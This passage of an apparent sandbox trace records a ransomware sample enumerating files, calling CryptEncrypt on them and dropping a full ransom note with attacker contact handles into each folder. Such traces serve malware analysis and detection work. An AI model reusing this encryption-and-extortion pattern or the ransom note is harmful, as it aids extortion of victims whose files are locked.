hFindFile=0x7c6760) returned 1 [0229.123] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\#Decrypt#.txt") returned 74 [0229.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\ar-SA\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ar-sa\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.126] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0229.126] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.128] lstrlenA (lpString="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") returned 1368 [0229.128] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.128] CloseHandle (hObject=0x158) returned 1 [0229.128] GetProcessHeap () returned 0x780000 [0229.128] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.129] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0229.129] lstrcmpiW (lpString1="bg-BG", lpString2="Windows") returned -1 [0229.129] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 60 [0229.129] lstrcmpW (lpString1="bg-BG", lpString2=".") returned 1 [0229.129] lstrcmpW (lpString1="bg-BG", lpString2="..") returned 1 [0229.129] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.129] GetProcessHeap () returned 0x780000 [0229.129] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0229.129] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*") returned 62 [0229.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.130] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\.") returned 62 [0229.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.130] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7545b2, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7545b2, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.130] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.130] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\..") returned 63 [0229.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.131] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0229.131] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.131] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.131] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned 76 [0229.134] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.134] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.134] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.134] lstrlenW (lpString=".testttjffg") returned 11 [0229.135] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.135] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.135] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.135] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.135] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.135] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.136] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\#Decrypt#.txt") returned 74 [0229.136] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.136] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0229.136] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.138] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0229.138] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.138] CloseHandle (hObject=0x158) returned 1 [0229.138] 
GetProcessHeap () returned 0x780000 [0229.138] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.139] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0229.139] lstrcmpiW (lpString1="Content.xml", lpString2="Windows") returned -1 [0229.139] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned 66 [0229.139] StrStrIW (lpFirst="Content.xml", lpSrch=".horseleader") returned 0x0 [0229.139] lstrcmpW (lpString1="Content.xml", lpString2="#Decrypt#.txt") returned 1 [0229.139] lstrcmpW (lpString1="Content.xml", lpString2="_uninstalling_.png") returned 1 [0229.139] lstrlenW (lpString=".testttjffg") returned 11 [0229.139] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", lpSrch=".testttjffg") returned 0x0 [0229.139] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.139] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.139] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.140] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0229.140] lstrcmpiW (lpString1="ConvertInkStore.exe", lpString2="Windows") returned -1 [0229.140] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned 74 [0229.140] StrStrIW (lpFirst="ConvertInkStore.exe", lpSrch=".horseleader") returned 0x0 [0229.140] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="#Decrypt#.txt") returned 1 [0229.140] lstrcmpW (lpString1="ConvertInkStore.exe", lpString2="_uninstalling_.png") returned 1 [0229.140] lstrlenW (lpString=".testttjffg") returned 11 [0229.140] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe", lpSrch=".testttjffg") returned 0x0 [0229.140] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0229.140] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0229.140] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\convertinkstore.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.141] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0229.141] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0229.141] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 60 [0229.141] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0229.141] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0229.141] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0229.141] GetProcessHeap () returned 0x780000 [0229.141] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0229.141] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*") returned 62 [0229.141] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, 
cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0229.142] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\.") returned 62 [0229.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0229.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0229.142] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\..") returned 63 [0229.142] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0229.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0229.142] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0229.142] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0229.142] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned 76 [0229.143] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0229.143] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0229.143] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0229.143] lstrlenW (lpString=".testttjffg") returned 11 [0229.143] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0229.143] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0229.347] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0229.347] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0229.347] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6ce8929, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe6f23d9c, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe6f23d9c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0229.347] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0229.348] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\cs-CZ\\#Decrypt#.txt") returned 74 [0229.348] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0229.348] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0229.348] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0229.349] lstrlenA (lpString="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") returned 1368 [0229.349] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0229.350] CloseHandle (hObject=0x158) returned 1 [0229.350] GetProcessHeap () returned 0x780000 [0229.350] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0229.350] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, 